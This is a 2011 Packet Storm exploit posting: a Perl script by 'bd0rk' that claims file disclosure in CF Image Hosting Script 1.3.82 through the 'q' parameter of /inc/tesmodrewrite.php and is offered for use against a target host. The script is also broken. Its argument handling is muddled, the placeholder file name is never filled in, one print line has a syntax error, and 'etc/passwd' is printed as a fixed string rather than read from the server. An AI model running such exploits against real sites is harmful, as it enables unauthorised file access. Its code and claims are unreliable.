CF Image Hosting Script 1.3.82 File Disclosure

2011-10-04T00:00:00
ID PACKETSTORM:105524
Type packetstorm
Reporter bd0rk
Modified 2011-10-04T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
#CF Image Hosting Script 1.3.82 File Disclosure Exploit  
#Bugfounder and Exploitcoder: bd0rk  
#Contact: www.sohcrew.school-of-hack.net  
#eMail: bd0rk[at]hackermail.com  
#Affected-Software: CF Image Hosting Script 1.3.82  
#Vendor: http://www.phpkode.com  
#Download: http://phpkode.com/download/p/CF_Image_Hosting_v1.3.zip  
  
#Vulnerable Code in /inc/tesmodrewrite.php line 28  
#echo "Current URL: " . $_GET['q'];  
  
#Tested on Ubuntu-Linux  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
sub help()  
{  
print "Sploit: perl $0 [targethost] /dir/\n";  
}  
  
print "\nCF Image Hosting Script 1.3.82 File Disclosure Exploit\n";  
print "\ By bd0rk bd0rk[at]hackermail.com\n";  
  
($inc, $targethost, $dir, $file,) = @ARGV;  
  
$inc="/inc/";  
$file="tesmodrewrite.php?q=[APossibleFile]";  
my $url = "http://".$targethost.$dir.$inc.$file;  
  
my $useragent = LWP::UserAgent->new();  
my $req = $useragent->get($url,":content_file"=>"[APossibleFile]");  
  
if ($req->is_success)  
  
{  
  
print "$url <= H3h3!\n\n";  
print "etc/passwd\n";  
  
exit();  
}  
else  
{  
print "Sploit $url Mhhh!\n[!]".$req->status_line.\n";  
  
exit();  
}  
  
`